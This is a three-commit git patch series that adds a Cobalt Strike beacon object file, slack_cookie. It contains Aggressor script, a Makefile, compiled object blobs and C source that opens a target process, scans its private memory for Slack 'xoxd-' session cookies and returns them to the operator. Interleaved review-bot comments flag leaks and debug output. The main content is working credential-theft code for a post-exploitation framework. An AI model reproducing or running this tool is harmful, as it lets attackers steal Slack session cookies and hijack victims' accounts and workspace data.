From 9cb0415678aa01b5942d3e748f13d712307779cc Mon Sep 17 00:00:00 2001
From: Tw1sm
Date: Wed, 25 Oct 2023 20:03:33 -0400
Subject: [PATCH 1/3] add slack_tokens bof

---
 Remote/Remote.cna                      | 23 +++
 Remote/slack_tokens/slack_tokens.x64.o | Bin 0 -> 5204 bytes
 Remote/slack_tokens/slack_tokens.x86.o | Bin 0 -> 5339 bytes
 src/Remote/slack_tokens/Makefile       | 25 +++
 src/Remote/slack_tokens/entry.c        | 208 +++++++++++++++++++++++++
 5 files changed, 256 insertions(+)
 create mode 100644 Remote/slack_tokens/slack_tokens.x64.o
 create mode 100644 Remote/slack_tokens/slack_tokens.x86.o
 create mode 100644 src/Remote/slack_tokens/Makefile
 create mode 100644 src/Remote/slack_tokens/entry.c

diff --git a/Remote/Remote.cna b/Remote/Remote.cna
index 53cb2d2..b3870e2 100644
--- a/Remote/Remote.cna
+++ b/Remote/Remote.cna
@@ -1820,4 +1820,27 @@ Usage: get_priv
 Privledge names are listed here https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
 They are the equivilent of what you see in whoami /all or our whoami bof from the SA repo
 "
+);
+
+alias slack_tokens
+{
+    local('$pid $args');
+    if(size(@_) != 2)
+    {
+        berror($1, "usage: slack_tokens ");
+        return;
+    }
+    $pid = parseNumber($2, 10);
+    berror($1, $pid);
+
+    $args = bof_pack($1, "i", $pid);
+    beacon_inline_execute($1, readbof($1, "slack_tokens"), "go", $args);
+}
+
+beacon_command_register(
+    "slack_tokens",
+    "Searches memory for Slack tokens",
+    "Command: slack_tokens
+
+Usage: slack_tokens "
 );
\ No newline at end of file
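Review bot: `berror($1, $pid);` right after the parseNumber call in the alias body looks like leftover debug output: it reports the parsed PID through the error channel on every invocation, before the BOF has run, and a reader will take it for a failure. If the intent is to echo the target, `blog($1, "PID: " . $pid);` says so; if it is validation, check the value instead, e.g. `if ($pid <= 0) { berror($1, "invalid pid"); return; }` (what parseNumber returns on a non-numeric argument is not visible here, so the exact guard should be confirmed against Aggressor's documentation).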
diff --git a/Remote/slack_tokens/slack_tokens.x64.o b/Remote/slack_tokens/slack_tokens.x64.o new file mode 100644 index 0000000000000000000000000000000000000000..274474b50f398f5914e6d951a16ce525dcc9e11a GIT binary patch literal 5204 zcma)AeQZ(lD`B}GPjW`0!R|qC|`WUMOWZ8hwSbRr! zD&ZvR>@?u*9d!g?AB$JIcNU9{Y;)-V*^M+hJOs1-P5wfC-GxTG5!iLiW$f^L>G$&x zeGGPXqn(Bv4#2MdL419y?y6@fH^z>5xmGn~XN>-{>t*<06J+8pAzgZ^t(_z@c-umV zmq>4n9_yOiwwdgsok!a!1*5!#)cj=lgsf*5@=5@v zzeK^mEMnrXx@XMsL&7q~uZB;X+zhS>pNR3}X8C@yCZbDs&zZ@Ka52Cyii#$G+Yoij z(4wNrFB$weC{f?w@1aKL(Iv8tQ&HcggCDxLGWPX={(EXXT$y!@R?%H1f6L%g*Pc&D zeap#wcBu2{d;Qa5hfFKYnSSCE*9})peg$UH6>ner)!2n6pF-7ls|`7&`+jRhaSyPM<>geriKlkaQCtRv3Ix@x)-brIB8eBu3CT2c{JCs6Hg6twmghs$U zg8?VNU!&f9O$~sUMba^MC@WNm@nbQ5UU?M$m23CRSf#XVVC)@dk$Vm!5zhnJ>A`5wuP1es})rm3wMvR{^#>GN5 z(N!WRG;JW~n~m`$w0b8XB{SZ<&-#dw1Qd(5lSXQ1n;RtaD5DqSXPO#EjUYBvsq z!6&OtJy@;h)jEo@F^%T{pgejywCZdj_q@`7PLnIX>C2m&C&rIQk_V8T^mN z`2L_aL7UID7mTsX=C~8oI-h=@lyZn*B8RE->9az=lH-4C1b=`xP z+$*kI${6KAbT04Zk%b1|+yMiFN0vcEd1SF!j&zv5*G8XM?025j-M=<=2ngA7bvB?6 zP@*NrYJ4>Z!ZqwJl}x z;1kOjYhj&Z4!JHbLVnYiKXTof6w3M_c61Fr!C#+nJ8$(SI(7u|ycC}Q2G4a%0GsJj z^w;!i>~?C{tEZ5rZx;(~8+`Wh!Qe0!*!0~WxHMh2U~e4HV#mQCcVP#gpmQvWoQAKx zVDcF`a0;MdS~i$n{Fu%wQXA!OO`C{$0_%uP-vqyuYTpoTos)+T6HCvhrDVbTeaycO zvb~kHuWJeU3cw5JvV~903*EFMP?#Ifm#rn)k< zGj9%?_f$t{&W`p%Tijo1IR$P(2V3ynKxpocj>4RHd&PgM<)W{>g|+v<$6P;~Yqu4o zC1c%QU?e$ybPkdH4-#1H$=|i$E(A={Y-Q{|V3Gs)nZP8^`5B7?leEyQDPWQ>;x__J zvKx1*1Hij2J7;Bkd)Ss-VrSOUoV=FJCsNwu#U3r2*~vCpiB#OqC#_;}z}l0y_p(U7 zluc>5ydw?MrCid<n_&>n^8 z%Btb#XZsZQ6QJ7!_bT3B5aS;IKzE1;jspb+ zdRJ)|v{k(<29g=wqPT8_Rs+dA`hjE~CXkHzA!U~X`m$)_ERbyNW2LsH2m7m&>S zaUj|c{OlQ}{f^T93}~g$UIC(g#m}w-trExulK$pnH<13IVDs^7g=H0W04);SJjKzx zmv*!>Ni9wlkNd1bn$l7>vIeyz5k)TRh7?C1LsCntM`~%8lU$!dQKdB$M?0XjqqQaL z4l3>;g|;j04#lMu8dln@;tC2mO52^rhKCY8pSXw~@-rJp&lz8vVr;AR)rb;-6 zG}hv)Q`SLRw=_P&M)0@bO}l@Mp_xHvL5;Zw44nj$5pCrQ;ykF?L|{XwLXFu9hR%i> zvkMHJ5R%!IM-dO56OyU_BBumeeRO_Mzt^7nuW^I~8=4P|PyLrTLV``Bo=Wv!;Rq5o 
zhnkG)zre9PU^9X@?ZdUF{_7iwz-H+UT4U@nuL=@^jrc07Iq}dz$PWA{uNIasIfW8N zl-7V`96M2@SwoLx2py)E_Ylk2^InOBWR5m5Cz_alG%*+!^+-QAH!-W4m`zPgsfqbU z6Z7LH=C@7Eu_oqx6LYPJSs+6fnMfFHVAh}{M=`i>-#%8bGdaiWdmvm~64@a^rr8!J z9bP?{hgd^+jez0RY@3~NtRZ=G8QPS{?XuW<%W1sO)Ce!XuF`*l{R1~>Wm_g?MTQghV1A&Kbux6(`gBuDF_^DfdnP9CfM#Z=ov`=n z9wl>((;%ch%1cB~rEJ^}J<{u+qGM;RTqB3;V9|0sP9;!xQTwzilFb(_dEN6=GKwhv Q_=_j(Vl|^08_PNDzmHdBumAu6 literal 0 HcmV?d00001 
diff --git a/Remote/slack_tokens/slack_tokens.x86.o b/Remote/slack_tokens/slack_tokens.x86.o new file mode 100644 index 0000000000000000000000000000000000000000..53accc7e0620d2d3bc11c1e1b7fdb6c4b03710bb GIT binary patch literal 5339 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 PEg|bKA|>(Gn9lwOk!O!3 literal 0 HcmV?d00001 diff --git a/src/Remote/slack_tokens/Makefile b/src/Remote/slack_tokens/Makefile new file mode 100644 index 0000000..88c8eb4 --- /dev/null +++ b/src/Remote/slack_tokens/Makefile 
@@ -0,0 +1,25 @@
+BOFNAME := slack_tokens
+COMINCLUDE := -I ../../common
+LIBINCLUDE :=
+CC_x64 := x86_64-w64-mingw32-gcc
+CC_x86 := i686-w64-mingw32-gcc
+CC=x86_64-w64-mingw32-clang
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.o $(COMINCLUDE) -Os -c entry.c -DBOF
+	$(CC_x86) -o $(BOFNAME).x86.o $(COMINCLUDE) -Os -c entry.c -DBOF
+	mkdir -p ../../../Remote/$(BOFNAME)
+	mv $(BOFNAME)*.o ../../../Remote/$(BOFNAME)
+
+test:
+	$(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x64.exe
+	$(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe
+
+scanbuild:
+	$(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE)
+
+check:
+	cppcheck --enable=all $(COMINCLUDE) --platform=win64 entry.c
+
+clean:
+	rm $(BOFNAME).*.exe
diff --git a/src/Remote/slack_tokens/entry.c b/src/Remote/slack_tokens/entry.c
new file mode 100644
index 0000000..5562c8b
--- /dev/null
+++ b/src/Remote/slack_tokens/entry.c
@@ -0,0 +1,208 @@
+#include 
+#include "bofdefs.h"
+#include "base.c"
+
+// Forward declarations:
+BOOL GetProcessList( int pid );
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz);
+void GetProcessMemory( HANDLE hProcess );
+
+typedef BOOL (*myReadProcessMemory)(
+    HANDLE hProcess,
+    LPCVOID lpBaseAddress,
+    LPVOID lpBuffer,
+    size_t nSize,
+    size_t *lpNumberOfBytesRead
+);
+
+typedef size_t(*myVirtualQueryEx)(
+    HANDLE hProcess,
+    LPCVOID lpAddress,
+    PMEMORY_BASIC_INFORMATION lpBuffer,
+    size_t dwLength
+);
+
+typedef struct _MEMORY_INFO
+{
+    LPVOID offset;
+    unsigned long long size;
+    DWORD state;
+    DWORD protect;
+    DWORD type;
+} MEMORY_INFO, *PMEMORY_INFO;
+
+BOOL GetProcessList( int pid )
+{
+    HANDLE hProcess;
+    hProcess = KERNEL32$OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid);
+    if( hProcess == NULL )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "OpenProcess Failed");
+        return(FALSE);
+    }
+
+    GetProcessMemory(hProcess);
+    KERNEL32$CloseHandle( hProcess );
+
+    return( TRUE );
+}
+
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz)
+{
+    myReadProcessMemory ptr_ReadProcessMemory = NULL;
+    BOOL rc = FALSE;
+    size_t bytesRead = 0;
+    unsigned char *buffer = NULL;
+    int index = 0;
+    int ret_sz = 1;
+
+    HMODULE KERNEL32 = LoadLibraryA("kernel32");
+    if( KERNEL32 == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
+        return;
+    }
+    ptr_ReadProcessMemory = (myReadProcessMemory)GetProcAddress(KERNEL32, "ReadProcessMemory");
+    if(!ptr_ReadProcessMemory )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
+        goto END;
+    }
+
+    buffer = intAlloc(address_sz+0x100);
+    if (buffer == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
+        goto END;
+    }
+
+    rc = ptr_ReadProcessMemory( hProcess, address, (char*)buffer, address_sz, &bytesRead );
+    if (rc == 0)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "\nReadProcessMemory failed\n");
+        BeaconPrintf(CALLBACK_ERROR, "Bytes Read %d\n", bytesRead);
+        BeaconPrintf(CALLBACK_ERROR, "\n\n\n %s\n\n\n", buffer );
+        return;
+    }
+
+    //for (index = 0; index < (address_sz/2)-8; index++)
+    for (index = 0; index < address_sz-5; index++)
+    {
+        // search for xoxd- [78 6f 78 64 2d]
+        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "Slack Token: %s", buffer + index);
+            index += MSVCRT$strlen((char *)(buffer + index)) - 1;
+        }
+    }
+END:
+    intFree(buffer);
+}
+
+void GetProcessMemory( HANDLE hProcess )
+{
+    LPVOID lpAddress = 0;
+    MEMORY_BASIC_INFORMATION lpBuffer = {0};
+    size_t VQ_sz = 0;
+    myVirtualQueryEx ptr_VirtualQueryEx = NULL;
+
+    if( hProcess == 0 )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "No Process Handle\n");
+        goto END;
+    }
+
+    HMODULE KERNEL32 = LoadLibraryA("kernel32");
+    if( KERNEL32 == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
+        goto END;
+    }
+
+    ptr_VirtualQueryEx = (myVirtualQueryEx)GetProcAddress(KERNEL32, "VirtualQueryEx");
+    if(!ptr_VirtualQueryEx)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
+        goto END;
+    }
+
+    do
+    {
+        PMEMORY_INFO mem_info = intAlloc(sizeof(MEMORY_INFO));
+        if (mem_info == NULL)
+        {
+            BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
+            goto END;
+        }
+        MSVCRT$memset(mem_info, 0, sizeof(MEMORY_INFO));
+        VQ_sz = ptr_VirtualQueryEx(hProcess, lpAddress, &lpBuffer, 0x30);
+        if( VQ_sz == 0x30 )
+        {
+            if(lpBuffer.State == MEM_COMMIT || lpBuffer.State == MEM_RESERVE)
+            {
+                mem_info->offset = lpAddress;
+                mem_info->size = lpBuffer.RegionSize;
+                mem_info->state = lpBuffer.State;
+                mem_info->type = lpBuffer.Type;
+                mem_info->protect = lpBuffer.Protect;
+            }else if( lpBuffer.State == MEM_FREE)
+            {
+                mem_info->offset = lpAddress;
+                mem_info->size = lpBuffer.RegionSize;
+                mem_info->state = lpBuffer.State;
+                mem_info->type = lpBuffer.Type;
+                mem_info->protect = lpBuffer.Protect;
+            }
+        }else if (VQ_sz == 0)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "End of memory\n");
+            goto END;
+        }
+        lpAddress = lpAddress + mem_info->size;
+        if( mem_info->protect == PAGE_READWRITE && mem_info->type == MEM_PRIVATE)
+            Write_Memory_Range( hProcess, mem_info->offset, mem_info->size);
+        intFree( mem_info );
+    } while(1);
+END:
+    return;
+}
+
+#ifdef BOF
+VOID go(
+    IN PCHAR Buffer,
+    IN ULONG Length
+)
+{
+    int pid = 0;
+    if(!bofstart())
+    {
+        return;
+    }
+
+    datap parser = {0};
+    BeaconDataParse(&parser, Buffer, Length);
+    pid = BeaconDataInt(&parser);
+
+    BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid);
+    GetProcessList( pid );
+
+    printoutput(TRUE);
+    bofstop();
+};
+
+#else
+
+int main( int argc, char* argv[])
+{
+//code for standalone exe for scanbuild / leak checks
+    int pid = 0;
+    if (argc > 1)
+    {
+        pid = atoi(argv[1]);
+        BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid);
+    }
+    GetProcessList( pid );
+    return 0;
+}
+
+#endif

From e2d8b058f4b6b37bbdcec7db73a4b0dd10847071 Mon Sep 17 00:00:00 2001
From: Tw1sm
Date: Wed, 25 Oct 2023 20:16:12 -0400
Subject: [PATCH 2/3] rename to slack_cookie

---
 README.md                                   |   1 +
 Remote/Remote.cna                           |  12 ++++++------
 .../slack_cookie.x64.o}                     | Bin 5204 -> 5204 bytes
 .../slack_cookie.x86.o}                     | Bin 5339 -> 5339 bytes
 .../{slack_tokens => slack_cookie}/Makefile |   2 +-
 .../{slack_tokens => slack_cookie}/entry.c  |   2 +-
 6 files changed, 9 insertions(+), 8 deletions(-)
 rename Remote/{slack_tokens/slack_tokens.x64.o => slack_cookie/slack_cookie.x64.o} (85%)
 rename Remote/{slack_tokens/slack_tokens.x86.o => slack_cookie/slack_cookie.x86.o} (84%)
 rename src/Remote/{slack_tokens => slack_cookie}/Makefile (96%)
 rename src/Remote/{slack_tokens => slack_cookie}/entry.c (98%)

diff --git a/README.md b/README.md
index e8c8866..5b847e3 100644
--- a/README.md
+++ b/README.md
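Review bot: The `return;` in Write_Memory_Range's ReadProcessMemory-failure branch (`if (rc == 0)`) skips the `END:` label, so the `buffer` obtained from intAlloc a few lines earlier is leaked on that path; it should be `goto END;` like the other failure exits in the same function. That branch also passes a `size_t` to `%d` in `"Bytes Read %d\n"` (use `%zu` or cast, as the format mismatch is undefined behaviour), and `int ret_sz = 1;` is declared but never used. In GetProcessMemory the `VQ_sz == 0` branch jumps to `END` while the current iteration's `mem_info` is still allocated, leaking it, and the `"Unable to load ws2 lib"` message in both functions names the wrong library — it is kernel32 whose LoadLibraryA failed.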
@@ -41,6 +41,7 @@ You are welcome to use these, but issues opened related to these will be closed |schtasksstop| Stop a running scheduled task| |setuserpass| Set a user's password| |shspawnas| A misguided attempt at injecting code into a newly spawned process| +|slack_cookie| Collect the Slack authentication cookie from a Slack process| |unexpireuser| Set a user account to never expire| ## Contributing diff --git a/Remote/Remote.cna b/Remote/Remote.cna index b3870e2..1bba1e6 100644 --- a/Remote/Remote.cna +++ b/Remote/Remote.cna @@ -1822,25 +1822,25 @@ They are the equivilent of what you see in whoami /all or our whoami bof from th " ); -alias slack_tokens +alias slack_cookie { local('$pid $args'); if(size(@_) != 2) { - berror($1, "usage: slack_tokens "); + berror($1, "usage: slack_cookie "); return; } $pid = parseNumber($2, 10); berror($1, $pid); $args = bof_pack($1, "i", $pid); - beacon_inline_execute($1, readbof($1, "slack_tokens"), "go", $args); + beacon_inline_execute($1, readbof($1, "slack_cookie"), "go", $args); } beacon_command_register( - "slack_tokens", + "slack_cookie", "Searches memory for Slack tokens", - "Command: slack_tokens + "Command: slack_cookie -Usage: slack_tokens " +Usage: slack_cookie " ); \ No newline at end of file diff --git a/Remote/slack_tokens/slack_tokens.x64.o b/Remote/slack_cookie/slack_cookie.x64.o similarity index 85% rename from Remote/slack_tokens/slack_tokens.x64.o rename to Remote/slack_cookie/slack_cookie.x64.o index 274474b50f398f5914e6d951a16ce525dcc9e11a..fd23dfa9e409fa2554499a02d2b5faecb39626ac 100644 GIT binary patch delta 65 zcmV-H0KWg!DAXvh76t*TlNSa<0lkx32K@odlUWB@0o#+a2Y3PQvn&Yn0R}^FZ)<5~ XlOzgzv!Dvh1pyb6@eUQUf)LUJCI}cg delta 64 zcmV-G0Kfm#DAXvh76t*SlNSa<0lbr22K@oclUWB@0os$Z2Y3PPvn&Yn0R>cVYh`Ye WB?^19p9;+d0Tz?-4i&S45Yht;aTnSE 
diff --git a/Remote/slack_tokens/slack_tokens.x86.o b/Remote/slack_cookie/slack_cookie.x86.o similarity index 84% rename from Remote/slack_tokens/slack_tokens.x86.o rename to Remote/slack_cookie/slack_cookie.x86.o index 53accc7e0620d2d3bc11c1e1b7fdb6c4b03710bb..96ae0d0bfd335ce90a6c3914e70daf328aa33e4f 100644 GIT binary patch delta 61 zcmV-D0K)& Date: Thu, 1 Feb 2024 11:45:39 -0500 Subject: [PATCH 3/3] use strnlen and FreeLibrary --- Remote/slack_cookie/slack_cookie.x64.o | Bin 5204 -> 5333 bytes Remote/slack_cookie/slack_cookie.x86.o | Bin 5339 -> 5443 bytes src/Remote/slack_cookie/entry.c | 7 ++++++- 3 files changed, 6 insertions(+), 1 deletion(-) 
diff --git a/Remote/slack_cookie/slack_cookie.x64.o b/Remote/slack_cookie/slack_cookie.x64.o index fd23dfa9e409fa2554499a02d2b5faecb39626ac..2c3e17798aaf4775d4347e6eeeb904b945a36ab8 100644 GIT binary patch delta 1522 zcmZXUZA@EL7{||TZ)q7ctz)DZb(C2G-Nr^?i*uQQn-F_DE{bu3`LaP3ge8kC*cxUq zgQr3E&65iTm4{{EyKXX_biJ{=1Y8uA**E(WEybl@qg|aHyCbm@AJF= z=Q-zjIlcX=dOGOtdeuqzRpucily>`Sj^cf*M2M@%)X82LKWXjU))kFKg=9Ycc)po_ ztl4n_a3OuV%F$X#$Xxo1`=yW53susM%-vGdZf{rGjAL>@nletw6&rVBV^uHZYgs8C zL`&`DMoo^Z^dsYY*|%;HuL`@S>7&L!a?SP&+^aVQc17rNgwAO6SCuve{2Ki!bdz06 zj>p_us)lc&={>jeVdDwM?%rNa-&3y)H4Max*=6UsnFgg#N&v`YWd=&~C8T~w(baj^XRs0tN?uB!AyAsctuOA=^M z*{|%|-`@7PIx=@4G>(1F@}lXNsy-O-XN&Q&cur0Jsp+wR-}8#ooPitaof$;vB>Ip0 zun-d@S?&@Eat&f$7oi|)=vyJHbP5Y%B`P{kz;$N=x#K)cFRg>goxvk?Rr$crwUvTf z=)6k5QR#w`t%c6MR!5d-W3hO36drbY7eE>Qud8ZqnkB)b`7sIwW4Rn6i^MSJ;2 z9wI~{@wZi^GAo!0d$|&!VOQ=&z8K>g#txqovI7T}zoZN&$_TL$Pm;SMDIa>g@!8*u z<(}i=Ba;W7I@EDcd0IKB98x+ajI?u?wBGpC8I)|sEob|^GfRw(A*`{3$4rc^zKkbb zFBoZ8na^8Dyl0AQi#pdGEo^m-7hI8lw9OM@+;VjWXJtZK(GRyL3kc~2bDP6G1m-r1 zFY9>b<-$H&qR&o<53)=KKvgD*5|?A3!n+wHwypF3S{--o&?puFJlAbrdE7@4| TaDR8VcKDh8X#X)|u_XE*Sp#Nv delta 1461 zcmZXUZD>9QP9b{1G4|TJ$%yMe)5=A*8%P=!C+ANusYk*`Ml{l32r7j~3tW z_M8HY6sIB{%}2;Y@k+BYT3m@Jlcmi{zuW#=ZSK6p8u=D#{Yi7>bQ3K!B9hGbu}DvK z7ZO4aI||LWfeGTNRk3fYO}-`Wn>P#Nw#(DD^LOqnbm<-Ytd)J%qG>&#R+k<&t=nuN z#&YG9-&{K(`_NOPcCTko<|DJ9yN%Jk`cSH#Rp`eR`u6e{wc4K15w|j!UV?EArSHMG zlj)lkGV*np>LixfHREh13~)-_Z!J^nA8J*NnJ9F& zK(kMy!Q2nve3#x?m>|oHjoo377)yUj^9S_~YVES(4b(cIA%I%(O)y%P=vCIEYJh47;qjz>}coQKm63nIe(fN&N@cz=jj8&7&#h5+k?ND~x z&%7P~nPYT0!a6$CUA_nZ5SKyXs6^0PAX&_N4jpl5 z%AwytJH*i!LAsy^jyK?0KP3c`Ep2hMc87L@GP09*fwB`5B&+_w3H%)Nnn-d3B-1@} zysa3hEcy+Q?ENcHtJpE_c#DqrClLQHQOTpNz;=O8K|2L8kUY>|y6az2w(+Y}NEj~> ze+Ka37b=y3K_QZ9do{Sl!!MTFn;Qm{Q>C$nDWzu)|6=Qp+`jmN^7sWMAVbAQiTZO& SM=AgE1;y?TZMBC(AN~hv$WTuJ 
diff --git a/Remote/slack_cookie/slack_cookie.x86.o b/Remote/slack_cookie/slack_cookie.x86.o index 96ae0d0bfd335ce90a6c3914e70daf328aa33e4f..b62873569a050dbb365b5a43b98eb4e18be779f7 100644 GIT binary patch delta 1182 zcmZXUZAep59LCR?_s;9f^;*qduyEA0RyM5+jS8AImo*}mm13r=R#sFrjLfKMbLEmj zaz0d0Uqbqjg~&ejp@`H*6j4+V6hYCKHApLqUWD6o&K-kraL@VO=l}d)?%D3%+J_gb z9%?51Q?C(H)~C*LhTGjV> zK~_H!>$3@&82T}hL0j2pse%@;B6&T1!S>1})XOf)8)hZWAvY?m=&WjQ%dUyK|E?N8 zIiB>gkMf$Cf9&5Pbv7v?+4KV5C)#G#ll`pJTvhA|ol(g5ffH(cgH5`HSfUK=;*yQ~ z40mLhJ(CK9om_|M9s9CpND>xYvGp=dR_0LJ!D+hyFTb+daka8uW)tyn@A;_n>kN;6bf1- zt@{>pX4W39&~=@6-wX?;SFxq0pPPE=URrfOBLxsY*Q3dtEa=&w50jNZf9kfW$N>GuY zO`!RL+CfG}cbYDOibeElTDu7{>c!I9eb7STdueDvH2w;-3$X?7gwgH<$Y^&qtz8CL zh3_`V7~w9cL}(8|iv|5nM|WfrvP5WpkdYAp85t2!F+WH%c>-K2=oQEz=pD#N8Dj%^ z4LL11H2#~hkZz`Fqs0vvn_?gnG(x&?RU*SsnhzWk>J|1|E0pu_YJ1q6{6X3udz`m1;!2ODKI;2fnZBG( zHPX*wb(Y{#H?ro@9;2F?qUFYlj_Po~1m7R@+LB(EFp1vs7Ca*7}Babu%v!dRl73G#AELxPFiK!DkZ`phhQHZrJbgRP`RqAto;#;;E*=lQk69T z1bT0e)L}`|$1V;cJ}K$TX8Q6OEMb$KTPuB|m9o^@ZJb&Obab{S210oN2CyqFnB)_i za20TFocGK4FI8O@*!lE;)Ie6LBFQ8|$EBdPbyZcvujK&th&#-O4Z$(ILhxisilNpf z)(>S|7s6u39g^_OdXk=*OhG`K-9riH{35_}J>OsxYgyih1^vYGufoG#7a5-}%-ZNP zt5Y0Ax)5KqrbtM{CL7Q+LN1b%r2oJ8s_gp)q6-hg!OV|34WL|s=NjrE>r+FkdcMI|BDCSg-q~*Lwnj1jc z$=!QMC7i~Qa&~cih^UpkqN%JlYd5LD2=C4y~)+vE?%BBC5q4@n=!9b@RGF@_<_ye9~ B;0FKz diff --git a/src/Remote/slack_cookie/entry.c b/src/Remote/slack_cookie/entry.c index 5d5917b..b9392ec 100644 --- a/src/Remote/slack_cookie/entry.c +++ b/src/Remote/slack_cookie/entry.c 
@@ -88,11 +88,12 @@ void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz)
     //for (index = 0; index < (address_sz/2)-8; index++)
     for (index = 0; index < address_sz-5; index++)
     {
+        size_t remainingSize = address_sz - index;
         // search for xoxd- [78 6f 78 64 2d]
         if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
         {
             BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index);
-            index += MSVCRT$strlen((char *)(buffer + index)) - 1;
+            index += MSVCRT$strnlen((char *)(buffer + index), remainingSize) - 1;
         }
     }
 END:
@@ -164,6 +165,10 @@ void GetProcessMemory( HANDLE hProcess )
         intFree( mem_info );
     } while(1);
 END:
+    if (KERNEL32)
+    {
+        FreeLibrary(KERNEL32);
+    }
     return;
 }
 
